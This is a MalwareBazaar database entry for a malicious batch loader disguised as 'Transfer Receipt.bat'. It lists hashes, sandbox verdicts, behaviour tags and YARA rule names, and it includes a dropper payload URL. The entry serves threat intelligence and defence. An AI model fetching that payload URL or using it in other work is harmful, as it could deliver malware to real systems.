MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 11


Intelligence 11 IOCs YARA 3 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236
SHA3-384 hash: 2a9db6a603fb6e1e99af70a37eabbe5fb31cd1acc4c363e7bc84e315fb54a2ba7c871dd46732a6690148fa22ee1a22c5
SHA1 hash: aeef4bf4270775cef6402054e42f5d3578cbe3f7
MD5 hash: ca6fa6e5a499456e93060e04e3334b7b
humanhash: carbon-gee-sixteen-failed
File name:Transfer Receipt.bat
Download: download sample
File size:58'109 bytes
First seen:2026-02-02 22:00:53 UTC
Last seen:Never
File type:Batch (bat) bat
MIME type:text/plain
ssdeep 1536:bilkmyopF4ONhopF4ONhopF4ONhopF4ONhopF4ONv:bivpFopFopFopFopF1
TLSH T12D43C504497BCA3612E0AC6E47DBDF26E128AB543B186F68BC1909DE47CEF062DDD705
Magika batch
Reporter James_inthe_box
Tags:bat exe

Intelligence

File Origin
# of uploads :
1
# of downloads :
113
Origin country :
US US
Vendor Threat Intelligence
No detections
Malware family:
n/a
ID:
1
File name:
Transfer Receipt.bat
Verdict:
Malicious activity
Analysis date:
2026-02-02 22:01:45 UTC
Tags:
stego payload loader reverseloader
Link:
https://app.any.run/tasks/0833b192-8ac5-4cfb-99ee-d2e66f745ec7

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/51356/
Detection(s):
SecuriteInfo.com.BAT.Obfus-4.UNOFFICIAL
Create hunting rule

Verdict:
Clean
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=69811ec22198a42a68053e2f
Tags:
n/a
Result
Verdict:
Malware
Maliciousness:

Behaviour
Running batch commands
Launching cmd.exe command interpreter
Launching a process
Creating a file
DNS request
Enabling autorun by creating a file
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
cmd lolbin powershell
Link:
https://www.filescan.io/uploads/69811ebe930564ff3c851cd0/reports/deed305a-9969-439b-9920-569325476ca4/overview
Verdict:
Malicious
Labled as:
PowerShell/TrojanDownloader.Agent
Link:
https://www.hybrid-analysis.com/sample/52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236
Verdict:
Malicious
File Type:
unix shell
First seen:
2026-02-02T19:02:00Z UTC
Last seen:
2026-02-04T08:39:00Z UTC
Hits:
~10
Detections:
PDM:Trojan.Win32.Generic PDM:Trojan.Win32.GenAutorunSchedulerTaskRun.c Trojan.Win32.Gasti.c
Link:
https://opentip.kaspersky.com/52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236/results?tab=lookup
Score:
77%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236/
Verdict:
Malicious
Threat:
Family.REVERSELOADER
Link:
https://tip.neiki.dev/file/52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236
Threat name:
Script.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2026-02-02 22:01:13 UTC
File Type:
Text (Batch)
AV detection:
6 of 38 (15.79%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=klwoypo7ghpucct6mw7vcsptc57muaorilm5x3l2dgcvhsq2ci3a._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
defense_evasion discovery execution
Link:
https://tria.ge/reports/260202-1xgwraes5g/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Hide Artifacts: Hidden Window
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Malware Config
Dropper Extraction:
https://uniworldrivercruises-co.uk/optimized_MSI.png
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/52ecec3ddf31df410a7e65bf5149f3177eca01d142d9dbed7a198553ca1a1236

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:DetectEncryptedVariants
Create hunting rule
Author:Zinyth
Description:Detects 'encrypted' in ASCII, Unicode, base64, or hex-encoded
Rule name:obfuscated_BAT
Create hunting rule
Author:@warz_s
Description:Identifies obfuscated BAT files
Reference:https://github.com/secwarz/YaraRules
Rule name:RANSOMWARE
Create hunting rule
Author:ToroGuitar

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/51356/

Comments